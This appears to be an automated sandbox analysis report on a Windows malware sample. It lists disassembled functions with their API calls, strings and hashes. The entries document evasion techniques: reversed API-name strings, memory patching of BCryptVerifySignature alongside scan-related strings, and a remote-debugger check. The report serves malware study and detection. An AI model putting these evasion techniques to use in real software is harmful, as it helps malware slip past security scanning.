                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                                                                                                                                                                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1759228003-2375825460
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 08f5ee5d6c0489a190a7eed401d67552f6b5bd956b0d09f8f2c6d4ab927f4a0b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 639382673b3395733b9079907c1fa9f034440f00c740aa21ed4b5c9b1604c7bc
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08f5ee5d6c0489a190a7eed401d67552f6b5bd956b0d09f8f2c6d4ab927f4a0b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8851C971A4025C7EFBE5D7E48C46FEF77AD9B04380F4401A1AB05E6181D7B59B449F60
                                                                                                                                                                                                                                                                                                                                                      Function 02D0894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 13205 2d0894c-2d08971 LoadLibraryW 13206 2d08973-2d0898b GetProcAddress 13205->13206 13207 2d089bb-2d089c1 13205->13207 13208 2d089b0-2d089b6 FreeLibrary 13206->13208 13209 2d0898d-2d089ac call 2d07d78 13206->13209 13208->13207 13209->13208 13212 2d089ae 13209->13212 13212->13208
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize,02D773A8,02D0A93C,UacScan), ref: 02D08960
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D0897A
                                                                                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000908,00000000,02D773A8,02D0A587,ScanString,02D773A8,02D0A93C,ScanBuffer,02D773A8,02D0A93C,Initialize), ref: 02D089B6
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D07DEC
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1002360270-4067648912
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 68beaa5b01ec77aff22bd0af12cea95a3be2ed23d33c60901cf241875b8c8134
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: bf3a67d289f5ad329290a5480ef5a70f1be8f144285db99e74fe735cc7715f26
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68beaa5b01ec77aff22bd0af12cea95a3be2ed23d33c60901cf241875b8c8134
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AF0AFB1EC03049EF350A668F889F57B79C978071CF000D29B9A88B380E6781C58DF60
                                                                                                                                                                                                                                                                                                                                                      Function 02D0F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 13222 2d0f744-2d0f75e GetModuleHandleW 13223 2d0f760-2d0f772 GetProcAddress 13222->13223 13224 2d0f78a-2d0f792 13222->13224 13223->13224 13225 2d0f774-2d0f784 CheckRemoteDebuggerPresent 13223->13225 13225->13224 13226 2d0f786 13225->13226 13226->13224
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KernelBase), ref: 02D0F754
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02D0F766
                                                                                                                                                                                                                                                                                                                                                      • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02D0F77D
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                                                                                                                                                                                                                                      • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 35162468-539270669
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e249136cd2247cc98066e636cf405416b640b71d808d87c0315e79f07f52cc98
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8576e007ae3833ae347282ff818ace80781e087e1f9f741429734cd366db9780
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e249136cd2247cc98066e636cf405416b640b71d808d87c0315e79f07f52cc98
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0F0EC70904248BEEB20A7F88CC87DCFBB99B45329F3447D1D435626E1EB752A45CA52
                                                                                                                                                                                                                                                                                                                                                      Function 02D0DD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02CF4F2E
                                                                                                                                                                                                                                                                                                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D0DE40), ref: 02D0DDAB
                                                                                                                                                                                                                                                                                                                                                      • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D0DE40), ref: 02D0DDDB
                                                                                                                                                                                                                                                                                                                                                      • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D0DDF0
                                                                                                                                                                                                                                                                                                                                                      • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D0DE1C
                                                                                                                                                                                                                                                                                                                                                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D0DE25
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF4C60: SysFreeString.OLEAUT32(02D0F4A4), ref: 02CF4C6E
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1897104825-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a60365f62b4171109737e6b0683329384715beb3866cc8ddb61a53dd763ac4d7
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 4b52bf7f8c4ceb8c6bc9b85fcb285f10ca94c12bac15e6fd5edb004ff12eff5f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a60365f62b4171109737e6b0683329384715beb3866cc8ddb61a53dd763ac4d7
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D21D371A40308BAEB51EAD4CC92FDF77BDEB48700F510462B700F72D0DA74AA059BA4
                                                                                                                                                                                                                                                                                                                                                      Function 02D0E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D0E5F6
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CheckConnectionInternet
                                                                                                                                                                                                                                                                                                                                                      • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3847983778-3852638603
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 50f9b8db45cd4c2957af835d6df2bbea7d419e30332cd93f27c0299823114488
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5e919ef7da185908069fae23cba1820416520d00e9e25f3a2fb3891cbea64d09
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50f9b8db45cd4c2957af835d6df2bbea7d419e30332cd93f27c0299823114488
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2412135B001499BEB98EBA4E881FDFB3BAEF88700F504825E641E7391DA30AD05DF55
                                                                                                                                                                                                                                                                                                                                                      Function 02D0DC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02CF4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02CF4F2E
                                                                                                                                                                                                                                                                                                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D0DD5E), ref: 02D0DCCB
                                                                                                                                                                                                                                                                                                                                                      • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D0DD05
                                                                                                                                                                                                                                                                                                                                                      • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D0DD32
                                                                                                                                                                                                                                                                                                                                                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D0DD3B
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3764614163-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8c876a9ca3c9c548f00393a3a264a4642fe9a9a4acf3291d84be44ea5b6c1a31
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 27510a333aa0f4da4bd63cbe950c5d0a09504b45a2fb3dd9e583b9fe9e45b5d9
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c876a9ca3c9c548f00393a3a264a4642fe9a9a4acf3291d84be44ea5b6c1a31
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0421BE71A40208BAEB60EAD4DD82FDEB7BDEB04B00F514462B704F72D0D7B4AE059A64
                                                                                                                                                                                                                                                                                                                                                      Function 02D07A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D07A9F
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4072585319-445027087
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c614c7939f309ee877e7b805e8d8e84184bfa44884dc5b78265002e0dd999564
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b1d503da8d6dcf0acfe97c4371f370891421b7bb5a8089941fd3a7fd4de510a7
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c614c7939f309ee877e7b805e8d8e84184bfa44884dc5b78265002e0dd999564
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF115E75644208BFFB54EFA5EC81FAEB7AEEB48700F504460BA04DB350E634AE04DB64
                                                                                                                                                                                                                                                                                                                                                      Function 02D07A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D07A9F
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                                                                                                                                                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4072585319-445027087
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 06d732347d54e581fccbdca0df8943387581d1af6500709a38caa855eb1da365
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a13db3418c44ff40f6613c7d9827a86ac86c9d0277c9965f37eb1394cf4c1647
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06d732347d54e581fccbdca0df8943387581d1af6500709a38caa855eb1da365
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1115E75644208BFFB54EFA5EC81FAEB7AEEB48700F504460BA04DB350D634AE04DB64
                                                                                                                                                                                                                                                                                                                                                      Function 02D08400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D08471
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                                                                                                                                                                                                                                      • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2521977463-737317276
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a5b6f5b100773bf4c34860475b1e6a2e7aff538904a9bf2c719679a3e7571a2b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 31ed9d91d3942aa720aaabab6d90bfe3204420d76d24bd0686dc5c217e6d163d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5b6f5b100773bf4c34860475b1e6a2e7aff538904a9bf2c719679a3e7571a2b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24012975640308AFEB94EFA8EC81F9AB7AEEB49700F514860FA04D7790D674ED149B24
                                                                                                                                                                                                                                                                                                                                                      Function 02D07D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D081CC: GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
